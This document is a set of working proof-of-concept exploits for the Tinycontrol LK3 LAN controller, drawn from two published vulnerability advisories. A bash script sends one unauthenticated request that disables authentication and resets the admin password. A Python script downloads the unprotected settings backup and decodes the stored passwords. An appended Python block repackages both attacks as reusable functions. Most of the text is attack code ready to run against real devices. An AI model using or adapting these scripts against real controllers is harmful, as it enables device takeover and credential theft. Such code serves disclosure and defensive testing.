<pre><code>#!/bin/bash<br />: "<br /><br />Tinycontrol LAN Controller v3 (LK3) Remote Admin Password Change<br /><br /><br />Vendor: Tinycontrol<br />Product web page: https://www.tinycontrol.pl<br />Affected version: <=1.58a, HW 3.8<br /><br />Summary: Lan Controller is a very universal<br />device that allows you to connect many different<br />sensors and remotely view their readings and<br />remotely control various types of outputs.<br />It is also possible to combine both functions<br />into an automatic if -> this with a calendar<br />when -> then. The device provides a user interface<br />in the form of a web page. The website presents<br />readings of various types of sensors: temperature,<br />humidity, pressure, voltage, current. It also<br />allows you to configure the device, incl. event<br />setting and controlling up to 10 outputs. Thanks<br />to the support of many protocols, it is possible<br />to operate from smartphones, collect and observe<br />the results on the server, as well as cooperation<br />with other I/O systems based on TCP/IP and Modbus.<br /><br />Desc: The application suffers from an insecure access<br />control allowing an unauthenticated attacker to<br />change account passwords and bypass authentication,<br />gaining control of the panel.<br /><br />Tested on: lwIP<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />                            @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5787<br />Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php<br /><br /><br />18.08.2023<br /><br />"<br /><br />set -euo pipefail<br />IFS=$'\n\t'<br /><br />if [ $# -ne 2 ]; then<br />    echo -ne "\nUsage: $0 [ipaddr] [desired admin pwd]\n\n"<br />    exit 1<br />fi<br /><br />IP=$1<br />PW=$2<br /><br /># The auth value is plain base64, '*'-separated: admin user (YWRtaW4= = admin),<br /># admin password, user name (dXNlcg== = user), user password.<br /># tr strips the line wrap base64 inserts for long passwords.<br />EN=$(echo -n "$PW" | base64 | tr -d '\n')<br /><br /># ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/<br />curl -s "http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg=="<br />echo -ne "\nAdmin password changed to: $PW\n"<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br />#<br />#<br /># Tinycontrol LAN Controller v3 (LK3) Remote Credentials Extraction PoC<br />#<br />#<br /># Vendor: Tinycontrol<br /># Product web page: https://www.tinycontrol.pl<br /># Affected version: <=1.58a, HW 3.8<br />#<br /># Summary: Lan Controller is a very universal<br /># device that allows you to connect many different<br /># sensors and remotely view their readings and<br /># remotely control various types of outputs.<br /># It is also possible to combine both functions<br /># into an automatic if -> this with a calendar<br /># when -> then. The device provides a user interface<br /># in the form of a web page. The website presents<br /># readings of various types of sensors: temperature,<br /># humidity, pressure, voltage, current. It also<br /># allows you to configure the device, incl. event<br /># setting and controlling up to 10 outputs. Thanks<br /># to the support of many protocols, it is possible<br /># to operate from smartphones, collect and observe<br /># the results on the server, as well as cooperation<br /># with other I/O systems based on TCP/IP and Modbus.<br />#<br /># Desc: An unauthenticated attacker can retrieve the<br /># controller's configuration backup file and extract<br /># sensitive information that allows them to bypass<br /># security controls and take over the system entirely.<br />#<br /># Tested on: lwIP<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />#                             @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2023-5786<br /># Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5786.php<br />#<br />#<br /># 18.08.2023<br />#<br />#<br /><br /><br />import subprocess<br />import requests<br />import base64<br />import sys<br /><br />binb = "lk3_settings.bin"   # settings backup, served without authentication<br />outf = "lk3_settings.enc"<br />bpatt = "0upassword"        # string that precedes the credential block<br />epatt = "pool.ntp.org"      # string that follows it<br />startf = False<br />endf = False<br />extral = []<br /><br />print("""<br /> O`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'O<br /> |                                          |<br /> |     Tinycontrol LK3 1.58 Settings DL     |<br /> |              ZSL-2023-5786               |<br /> |        2023 (c) Zero Science Lab         |<br /> |                                          |<br /> |`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'|<br /> |                                          |<br />""")<br /><br />if len(sys.argv) != 2:<br />    print("[?] Usage: python3 {} ipaddr:port".format(sys.argv[0]))<br />    sys.exit(0)<br />else:<br />    rhost = sys.argv[1]<br />    if not rhost.startswith("http"):<br />        rhost = "http://{}".format(rhost)<br /><br />try:<br />    resp = requests.get(rhost + "/" + binb, timeout=10)<br />    if resp.status_code == 200:<br />        with open(outf, 'wb') as f:<br />            f.write(resp.content)<br />        print(f"[*] Got data as {outf}")<br />    else:<br />        print(f"[!] Backup failed. Status code: {resp.status_code}")<br />        sys.exit(-1)<br />except Exception as e:<br />    print("[!] Error:", str(e))<br />    sys.exit(-1)<br /><br /># Pull the printable strings out of the backup (needs the binutils `strings` tool on PATH)<br />binf = outf<br />sout = subprocess.check_output(["strings", binf], universal_newlines=True)<br />linea = sout.split("\n")<br /><br /># Collect the lines between the two markers; the second and fourth hold the<br /># base64-encoded user and admin passwords<br />for thricer in linea:<br />    if bpatt in thricer:<br />        startf = True<br />    elif epatt in thricer:<br />        endf = True<br />    elif startf and not endf:<br />        extral.append(thricer)<br /><br />if len(extral) >= 4:<br />    userl = extral[1].strip()<br />    adminl = extral[3].strip()<br />    try:<br />        decuser = base64.b64decode(userl).decode("utf-8")<br />        decadmin = base64.b64decode(adminl).decode("utf-8")<br />        print("[+] User password:", decuser)<br />        print("[+] Admin password:", decadmin)<br />    except Exception as e:<br />        print("[!] Error decoding:", str(e))<br />else:<br />    print("[!] Credential markers not found in backup.")<br />    sys.exit(-2)<br /></code></pre>
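The two Tinycontrol PoCs above are two views of the same weakness: credentials travel and rest as plain base64. The block below is an added example, not Tinycontrol or Zero Science code, and serves both advisories: it builds and decodes the `stm.cgi?auth=` value the bash script sends (the `*`-separated admin user, admin password, user name, user password, prefixed by the two flag digits), and it re-implements the settings-backup scan from the Python PoC without shelling out to `strings`, so it also runs where that tool is absent. The backup layout between the two markers and the sample blob are constructed assumptions.

```python
# Added example, not Tinycontrol or Zero Science code: builds and decodes the
# stm.cgi auth= value the bash PoC sends and re-implements the settings-backup
# scan above without shelling out to `strings`. The backup layout is assumed
# from the markers the PoC searches for; the sample blob is constructed here.
import base64
import re

# Constructed stand-in for lk3_settings.bin: binary junk, then the credential
# block framed by the two markers the PoC keys on.
SAMPLE_BACKUP = (
    b"LK3\x00\x01\x02\x00\xff"
    b"0upassword\x00user\x00dXNlcg==\x00admin\x00czNjcmV0\x00"
    b"pool.ntp.org\x00\x00"
)


def build_auth(admin_pw: str, user_pw: str = "user",
               admin_user: str = "admin", user_user: str = "user",
               flags: str = "00") -> str:
    """auth=<flags><b64 admin user>*<b64 admin pw>*<b64 user name>*<b64 user pw>"""
    fields = [admin_user, admin_pw, user_user, user_pw]
    return flags + "*".join(base64.b64encode(f.encode()).decode() for f in fields)


def parse_auth(value: str) -> dict:
    """Inverse of build_auth; shows there is no secret in the scheme at all."""
    flags, rest = value[:2], value[2:]
    admin_user, admin_pw, user_user, user_pw = (
        base64.b64decode(p).decode() for p in rest.split("*"))
    return {"flags": flags, "admin": (admin_user, admin_pw), "user": (user_user, user_pw)}


def change_password_url(ip: str, new_admin_pw: str) -> str:
    """The request the bash PoC issues, flags 00 = auth off, upgrade off."""
    return "http://%s/stm.cgi?auth=%s" % (ip, build_auth(new_admin_pw))


def extract_strings(blob: bytes, minlen: int = 4) -> list:
    """Pure-Python stand-in for `strings`: runs of printable ASCII of minlen or more."""
    pattern = rb"[\x20-\x7e]{%d,}" % minlen
    return [m.decode("ascii") for m in re.findall(pattern, blob)]


def extract_passwords(blob: bytes, start: str = "0upassword",
                      end: str = "pool.ntp.org") -> dict:
    """Same walk as the PoC: second and fourth strings between the markers."""
    lines = extract_strings(blob)
    try:
        i = next(k for k, s in enumerate(lines) if start in s)
        j = next(k for k, s in enumerate(lines) if end in s and k > i)
    except StopIteration:
        raise ValueError("credential markers not found") from None
    between = lines[i + 1:j]
    if len(between) < 4:
        raise ValueError("credential block too short")
    return {"user": base64.b64decode(between[1]).decode(),
            "admin": base64.b64decode(between[3]).decode()}
```

`build_auth("s3cret")` yields `00YWRtaW4=*czNjcmV0*dXNlcg==*dXNlcg==`, the exact string the bash script assembles; `extract_passwords` applied to a downloaded `lk3_settings.bin` replaces the `strings` subprocess in the Python PoC and fails loudly when the markers are missing instead of reporting a spurious "regex" error.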